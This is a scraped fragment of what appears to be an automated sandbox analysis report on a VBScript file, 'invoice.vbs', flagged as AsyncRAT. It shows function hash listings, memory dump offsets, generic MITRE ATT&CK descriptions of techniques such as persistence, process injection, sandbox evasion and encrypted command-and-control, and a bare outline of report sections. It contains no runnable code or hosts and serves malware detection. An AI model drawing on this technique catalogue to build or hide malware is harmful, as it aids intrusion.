Opcode ID: 64583d7c316912422afb5ff4b30c6becc914011334f20b9b6d39958e0f1b0bac
Instruction ID: dab3519bf8a89a6bf20f360b7f36d05b3f54614c4950b99a57b331db50d2262d
Opcode Fuzzy Hash: 64583d7c316912422afb5ff4b30c6becc914011334f20b9b6d39958e0f1b0bac
Instruction Fuzzy Hash: 5A31DD74B002158FCB94DB788450AAEBBF2FF88208B24407EE545DB3A1EB70DC458B91

Uniqueness

Uniqueness Score: -1.00%

Function 01540F48, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e028506fdbf3f4c6a240eb6a3147c3d6ea1499ce5cdcc7fb2eedda2b54b2d50b
Instruction ID: accb1f317fb35adb89cd911bfafa708f03cef3d6ae06eb12209e5c8cc5baf3b3
Opcode Fuzzy Hash: e028506fdbf3f4c6a240eb6a3147c3d6ea1499ce5cdcc7fb2eedda2b54b2d50b
Instruction Fuzzy Hash: 9B21DD74B002158FCB54EB788550AAEBBF2FF88208B24407EE605DB3A1EF30DC458B91

Uniqueness

Uniqueness Score: -1.00%

Function 01540598, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f83c5f898f1e94259df1ae562aec2e2430d30eef7dd34460807edea7160ddb
Instruction ID: 73c28502517bc6f663a2044ac871b56be7ce299481f6d789f6102a9c8cbe50ec
Opcode Fuzzy Hash: 82f83c5f898f1e94259df1ae562aec2e2430d30eef7dd34460807edea7160ddb
Instruction Fuzzy Hash: 032101306042059FDF649F7995586FE36A4BB8428DB341439FA47CE1A5EB34C8408B92

Uniqueness

Uniqueness Score: -1.00%

Function 01540E48, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1af2291ccc7d12c5432f91de47516ffc6b09179419c2798daa6d26799dc3f57
Instruction ID: 10bc2e369390093ad8e4e46c57570e2c1379d7e9a764f03f0bf50ba51f6530df
Opcode Fuzzy Hash: c1af2291ccc7d12c5432f91de47516ffc6b09179419c2798daa6d26799dc3f57
Instruction Fuzzy Hash: 0811B160B052095FCB44BBB958102BEB5DAEFE9A44F10453ED50AD7B45DE34CC4A43E2

Uniqueness

Uniqueness Score: -1.00%

Function 015405A8, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fac551dbf3f8fb0e4521e108e9f2a30107ae783134399c517747fbb1f50a9b
Instruction ID: 4cf02adaedc0919547481ee136382aaece3aabe408ea0b445c9a417556c9e25c
Opcode Fuzzy Hash: 41fac551dbf3f8fb0e4521e108e9f2a30107ae783134399c517747fbb1f50a9b
Instruction Fuzzy Hash: E42133306052058FDF68AF7996586BE36A4BB8428DB301439FE07CE5D5EF34C844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01541040, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08865b437961c7390ff3724173b7694938973ca6e1b58f0d922190f0d546abc
Instruction ID: 02e425f5c670cdaea5137e2629e57f7bab8760f5de186ab3bb1935d09f54a61b
Opcode Fuzzy Hash: b08865b437961c7390ff3724173b7694938973ca6e1b58f0d922190f0d546abc
Instruction Fuzzy Hash: D5118B74B00208CFCB54DBB8C54496ABBEAFF882997120878C50ACB311EF35EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01541031, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f306c87dd991c9423e9aa17245b60f9e1db149ba8a3044a4d778b084bdbcf69
Instruction ID: f2213684b9d26a3bfbbc11725fc312655cfb67de5138de624396ed63506bdcf5
Opcode Fuzzy Hash: 1f306c87dd991c9423e9aa17245b60f9e1db149ba8a3044a4d778b084bdbcf69
Instruction Fuzzy Hash: EA115A74B00208CFCB54DF78C9849AAB7E6FF8825970548B9D50ACB325EB35EC55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01540A3D, Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d0bdeefecafac6009c1a07a69b1a9884940a68b898a808c3d991f069edb0ff
Instruction ID: a912f5b7e0354ba718a6620aa7d12d82d3aab2d5a5bd24cef101ec249a7043b9
Opcode Fuzzy Hash: 28d0bdeefecafac6009c1a07a69b1a9884940a68b898a808c3d991f069edb0ff
Instruction Fuzzy Hash: 6401DB703083640FC7559B3854645AE7BE6AFCA19831640BBD54ACF366DE358C068762

Uniqueness

Uniqueness Score: -1.00%

Function 01540A80, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a554084ffc8b212e7fd6e489363230aa6ec027e8e4e6a960cd6372ef86c8f52
Instruction ID: 29e00266c19574046e916789fda069aecd922c46f11cc995bb8a7bdd46ecddab
Opcode Fuzzy Hash: 6a554084ffc8b212e7fd6e489363230aa6ec027e8e4e6a960cd6372ef86c8f52
Instruction Fuzzy Hash: B1E08C353001005F8354967EA8888AAB7DAEBC81A9314407AE20AC7325CE71CC058790

Uniqueness

Uniqueness Score: -1.00%

Function 01540673, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914f9d9ed2d33b933d3ed315564bdb326a5bbecc36c9168213f1796b1f3695c4
Instruction ID: 69887f43ee8ef24bb04dc9980229deabe3d0478afebd49a1b1d3b388e7b878a3
Opcode Fuzzy Hash: 914f9d9ed2d33b933d3ed315564bdb326a5bbecc36c9168213f1796b1f3695c4
Instruction Fuzzy Hash: 6BC012340092428BDB7453A0A3096A83A5167D028CF200450FA038CAF58E3408848B13

Uniqueness

Uniqueness Score: -1.00%

Function 0154068F, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.727861691.0000000001540000.00000040.00000001.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a077d80a153ce88211af29381f65d7a7ee95ea24674911ca880dcf8b325cfe06
Instruction ID: 5aa2a28176ef9c0a1bcfc51502325bb45c3a84564fe9b22c0940416cd28554d4
Opcode Fuzzy Hash: a077d80a153ce88211af29381f65d7a7ee95ea24674911ca880dcf8b325cfe06
Instruction Fuzzy Hash: 1EC002385092468FDB7567A4A3496AC2A516BD034DF644454FA478DAF98E3409444B63

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report invoice.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: AsyncRAT

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back